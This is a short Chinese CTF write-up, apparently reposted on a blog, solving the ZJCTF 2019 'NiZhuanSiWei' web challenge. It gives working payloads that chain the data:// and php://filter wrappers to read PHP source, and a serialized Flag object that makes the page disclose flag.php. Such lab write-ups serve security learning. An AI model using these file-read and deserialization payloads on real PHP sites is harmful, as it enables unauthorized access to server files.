BUUCTF-[BJDCTF2020]NiZhuanSiWei

作者: 低调求发展 | 来源:发表于2020-11-16 12:30 被阅读0次

BUUCTF-[BJDCTF2020]NiZhuanSiWei
BUUCTF-[BJDCTF2020]Easy MD5 记录
2020-BJDCTF-Web-Easy MD5
ZJCTF 2019-WEB-NiZhuanSiWei
[BJDCTF2020]BJD hamburger compet
[BJDCTF2020]Easy MD5
BUUCTF-[RoarCTF 2019]Easy Java
BUUCTF-[HCTF 2018]WarmUp 记录
BUUCTF-[RoarCTF 2019]Easy Calc
BUUCTF-[HCTF 2018]admin 记录

24.[ZJCTF 2019]NiZhuanSiWei

打开一段源码：看了下源码，这题主要考察伪协议data:写入，和php://filter读取文件以及反序列化。

data用法：data://text/plain;base64,

php://filter用法：php://filter/read=convert.base64-encode/resource=

访问
http://68a56f51-a28e-415e-b2dd-79cf3197e5cd.node3.buuoj.cn/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php

返回一段base64加密数据

解密得到一段代码：

代码是一个读到flag.php文件，前面password变量进行反序列化读取。

构造：

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

最重payload：?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

这里直接file=useless.php，不用php://filter读取。读取的话会不行。

flag就在源代码里面

网友评论

本文标题：BUUCTF-[BJDCTF2020]NiZhuanSiWei

本文链接：https://www.haomeiwen.com/subject/pyqlmktx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

BUUCTF-[BJDCTF2020]NiZhuanSiWei

24.[ZJCTF 2019]NiZhuanSiWei

相关文章

BUUCTF-[BJDCTF2020]NiZhuanSiWei

BUUCTF-[BJDCTF2020]Easy MD5 记录

2020-BJDCTF-Web-Easy MD5

ZJCTF 2019-WEB-NiZhuanSiWei

[BJDCTF2020]BJD hamburger compet

[BJDCTF2020]Easy MD5

BUUCTF-[RoarCTF 2019]Easy Java

BUUCTF-[HCTF 2018]WarmUp 记录

BUUCTF-[RoarCTF 2019]Easy Calc

BUUCTF-[HCTF 2018]admin 记录

网友评论

延伸阅读

深度阅读

栏目导航

热点阅读